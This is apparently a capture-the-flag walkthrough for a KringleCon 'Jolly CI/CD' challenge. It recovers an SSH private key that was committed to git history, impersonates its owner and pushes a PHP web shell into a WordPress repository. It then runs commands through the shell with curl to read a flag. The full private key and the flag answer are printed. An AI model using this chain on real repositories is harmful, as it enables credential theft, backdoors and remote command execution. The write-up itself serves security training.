Skip to content

Jolly CI/CD

Jolly CI/CD                                         Elfen Ring                                         A picture containing clipart Description automatically generatedRippin Proudboot

A picture containing text Description automatically generated

A screenshot of a computer Description automatically generated with medium confidence

Hints
1) The thing about Git is that every step of development is accessible even steps you didn't mean to take! git log can show code skeletons.

2) Gitlab repo http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

3) If you find a way to impersonate another identity, you might try re-cloning a repo with their credentials.

Clone the git repo and get into the directory where it was cloned into

 
git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
cd wordpress.flag.net.internal

Get git logs. Shows a commit with potential mistake with whoops comment

 
git log --oneline

Show the log with commits. Looks like sporx@kringlecon.com committed with "whoops" comment.

 
git log

A picture containing graphical user interface Description automatically generated

Show what was committed under that id e19f653bde9ea3de6af21a587e41e7a909db1ca5
Looks like user has committed their the private and public key. So we will use these to clone the repo and commit changes impersonating the user

 
git show e19f653bde9ea3de6af21a587e41e7a909db1ca5

Create .ssh folder and create the private key (.deploy) and public key(.deploy.pub) from the contents above

 
mkdir /home/samways/.ssh
cd /home/samways/.ssh
nano .deploy

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW

QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5

9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g

AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot

PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==

-----END OPENSSH PRIVATE KEY-----

 

nano .deploy.pub

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.com

 

Set the full read and write permission only for the owner

 
chmod 600 .deploy
chmod 600 .deploy.pub 
ls -lah

Text Description automatically generated

Set the git config email and name

 
git config --global user.email "sporx@kringlecon.com"
git config --global user.name "knee-oh"

Text Description automatically generated

Start the SSH agent

 
eval "$(ssh-agent -s)"

Add the SSH private key to the SSH agent

 
ssh-add .deploy

Clone the git repo again with SSH using the private key of the user sporx@kringlecon.com to a directory named "wordpress.flag.net.internal2"

 
git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
wordpress.flag.net.internal2

The repo is now cloned to the "wordpress.flag.net.internal2" directory

 
ls wordpress.flag.net.internal2

Create a new backdoor to execute commands on the remote host (wordpress web server, wordpress.flag.net.internal). This will take a querystring cat=<URL encoded command>

 
nano shell.php

Add the newly saved shell.php and commit to the repo

 
git add .
git commit

Push the changes to the remote repository

 
git push

Text Description automatically generated

Now we can execute arbitrary commands using shell.php. Below showing using ls command which also lists newly uploaded shell.php

 
curl http://wordpress.flag.net.internal/shell.php?cmd=ls

Getting contents of root (/) showing flag.txt

 
curl http://wordpress.flag.net.internal/shell.php?cmd=ls%20%2F%2F

Text Description automatically generated

Getting the contents of that /flag.txt

 
curl http://wordpress.flag.net.internal/shell.php?cmd=cat%20%2Fflag.txt

Chart Description automatically generated

Answer : oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT

The objective is now completed and we get 100 coins as well

Text Description automatically generated with medium confidence

At this point we have recovered the Elfen ring